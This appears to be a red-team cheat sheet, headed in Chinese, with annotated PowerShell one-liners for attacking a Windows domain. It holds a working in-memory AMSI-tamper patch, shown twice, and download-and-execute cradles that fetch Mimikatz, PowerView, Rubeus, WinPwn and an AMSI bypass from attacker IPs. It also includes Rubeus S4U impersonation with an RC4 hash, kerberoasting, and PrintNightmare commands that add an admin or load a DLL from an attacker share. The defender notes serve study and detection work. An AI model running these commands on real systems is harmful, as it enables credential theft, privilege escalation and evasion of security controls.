# 内存加载
```
# In-memory AMSI tamper, compressed into one command line so it survives paste into a shell.
# It reflects into the assembly that defines [Ref] (System.Management.Automation), selects the
# type whose name ends in "iUtils", then that type's non-public static field ending in "Context",
# reads the field as a pointer and overwrites the first 32 bits it references with 0.
# Nothing touches disk; the observable artifacts are the script text itself (PowerShell script
# block logging) and the reflection pattern GetTypes / GetFields('NonPublic,Static') /
# Marshal::Copy against a live pointer, all in a single statement.
# Defender note: AMSI-aware EDR treats this in-process write as AMSI tampering; Constrained
# Language Mode denies both arbitrary .NET reflection and the Marshal call, so the line fails
# closed there. Application control (AppLocker/WDAC) enforcing CLM is the mitigation.
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```
#### 内存加载Rubeus
```
# Stage 1: fetch the AMSI-tamper script over cleartext HTTP and run it with Invoke-Expression.
# No file is written; the text only exists in the PowerShell process (and in script block logs).
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | IEX
# Stage 2: download Rubeus as raw bytes and load it as a .NET assembly directly from memory.
# Assembly.Load(byte[]) bypasses the file system entirely; module-load telemetry shows an
# assembly with no backing path.
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
# Drop the cached Kerberos tickets of the current logon session before requesting new ones.
[Rubeus.Program]::Main("purge".Split())
# S4U (constrained delegation) request as the web01$ computer account, impersonating
# administrator to cifs/file01, with the resulting ticket injected into the session (/ptt).
# NOTE(review): the /rc4: value is a credential-equivalent secret; treat it like a password,
# not like a note.
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:12343649cc8ce713962859a2934b8cbb /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
# "//" is not a PowerShell comment token. As written this line is executed as a command named
# "//wait", raising a non-terminating CommandNotFound error; execution continues. Use "#".
//wait test
# Kerberoast: request service tickets for SPN-bearing accounts and save them in hashcat format.
# Defender note: the S4U and kerberoast steps both surface as TGS requests on the KDC
# (Security event 4769); a burst of RC4-encrypted (etype 0x17) service tickets for user
# accounts is the classic kerberoast indicator.
[Rubeus.Program]::Main("kerberoast /outfile:hashes.txt /format:hashcat".Split())
```
#### 内存载入amsi bypass
```
# Download the AMSI-tamper script text over cleartext HTTP and execute it in memory via IEX.
# Nothing lands on disk; detection depends on script block logging, Net.WebClient network
# telemetry from powershell.exe, and AMSI inspecting the content handed to Invoke-Expression.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | IEX
```
#### 内存载入mimikatz #待测试
```
# Fetch Invoke-Mimikatz.ps1 over cleartext HTTP (non-default port 81) and run it in memory.
# Heading marks this as untested. Defender note: the script reads LSASS memory; Credential
# Guard / RunAsPPL on LSASS and LSASS-access EDR telemetry are the controls that matter here,
# not the download itself.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84:81/Invoke-Mimikatz.ps1') | iex
```
#### 内存载入powerview
```
# Load PowerView (AD enumeration) from an internal host over cleartext HTTP, executed via IEX.
# Defender note: the follow-on LDAP queries are the detectable part (broad searches from a
# workstation, high query volume against the DC), more so than this one-line loader.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/PowerView.ps1') | iex
```
#### 内存载入 CVE-2021-1675 (PrintNightmare)
```
# Load the PrintNightmare (CVE-2021-1675) PoC module into memory over cleartext HTTP (port 88).
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:88/Invoke-Printnightmare.ps1') | iex
# Author's note, not a command: PowerShell evaluates this as the integer expression 2021-1675
# and prints 346.
2021-1675
# Repeated attempts with different -DriverName values; the PoC's -NewUser/-NewPassword mode is
# documented to add a local administrator account through the spooler's driver-install path.
# The notes below record which name worked in the author's environment.
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
Invoke-Nightmare -DriverName "SensorService" -NewUser "john" -NewPassword "SuperSecure"
Invoke-Nightmare -DriverName "tapisrv1" -NewUser "john" -NewPassword "SuperSecure"
# Result note, not runnable as written: the trailing "success !" would be parsed as extra
# positional arguments to Invoke-Nightmare.
Invoke-Nightmare -DriverName "dq15w" success !
# On-disk variant of the same PoC. -DLL makes the spooler load an arbitrary DLL as a "driver",
# first from local paths, then (third line) from a UNC share on the attacker host.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "c:\users\public\met.dll"
Invoke-Nightmare -DLL "//192.168.49.57/test/shell.dll"
Invoke-Nightmare -DLL "c:\users\nina\desktop\adduser64.dll"
# Duplicate of the previous line.
Invoke-Nightmare -DLL "c:\users\nina\desktop\adduser64.dll"
# Defender note: addressed by Microsoft's 2021 patches; disable the Print Spooler where the host
# does not print, restrict Point and Print driver installation by policy, and alert on
# Microsoft-Windows-PrintService/Operational 316 (printer driver added) and /Admin 808
# (spooler failed to load a plug-in module) paired with new DLLs in the spool drivers directory.
```
#### 内存载入powersharppack
```
# Load PowerSharpPack (a bundle of reflectively-loaded .NET tools) over cleartext HTTP via IEX.
# Defender note: the payloads inside are Assembly.Load'ed from byte arrays, so expect in-memory
# assemblies with no file path in CLR/ETW module-load telemetry.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/PowerSharpPack.ps1') | IEX
```
#### POWERup MSSQL
```
# Load PowerUpSQL (SQL Server enumeration/abuse) from an internal host (port 81) via IEX.
# Defender note: the useful signal is on the SQL side — logins from unexpected hosts, use of
# xp_cmdshell or linked-server hopping — rather than in this loader line.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84:81/PowerUpSQL.ps1') | iex
```
#### AMSI SHELL
//有失败几率,最好是直接用powercat来好了
```
# Step 1: remote AMSI-tamper script, fetched over cleartext HTTP and run in memory.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt') | iex
# Step 2: local fallback — the inline reflection patch (same one-liner as under 内存加载):
# find the internal "*iUtils" type, its non-public static "*Context" field, and zero the
# 32 bits its pointer references. Observable only via script block logging / EDR AMSI-tamper
# detection; blocked outright under Constrained Language Mode.
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
# Step 3: fetch run.ps1 and execute it. Note the double evaluation: IEX runs the downloaded
# text, and anything that script writes to the pipeline is then handed to a second iex.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.ps1') | iex
# Keep the host process alive (~11.5 days) so whatever run.ps1 started is not torn down when
# the script ends. A powershell.exe sleeping this long is itself an anomaly worth alerting on.
Start-Sleep -Seconds 1000000
```
#### powersploit
```
# Load PowerSploit's module manifest text over cleartext HTTP and IEX it. Note that a .psd1 is
# a hashtable manifest, not the module code; piping it to iex evaluates the manifest only, so
# whether the functions referenced below become available this way is doubtful — verify.
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/PowerSploit.psd1') | iex
```
```
# Presumably enumerates AD computers with LAPS-managed local admin passwords (ms-Mcs-AdmPwd
# attribute) — the function is not defined on this page and is not part of PowerSploit, so
# the module it comes from must be loaded separately; verify.
# Defender note: reading ms-Mcs-AdmPwd requires an extended right on the computer object;
# audit which principals hold it and alert on bulk reads of that attribute.
Get-LAPSComputers
```
#### winpwn
```
# Load WinPwn (heading) from an internal host on port 88 — note the file is named finepwn.ps1,
# not winpwn.ps1; presumably a renamed copy. Same in-memory download-and-IEX pattern as the
# loaders above, with the same detection surface (script block logging, WebClient egress).
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:88/finepwn.ps1') | iex
```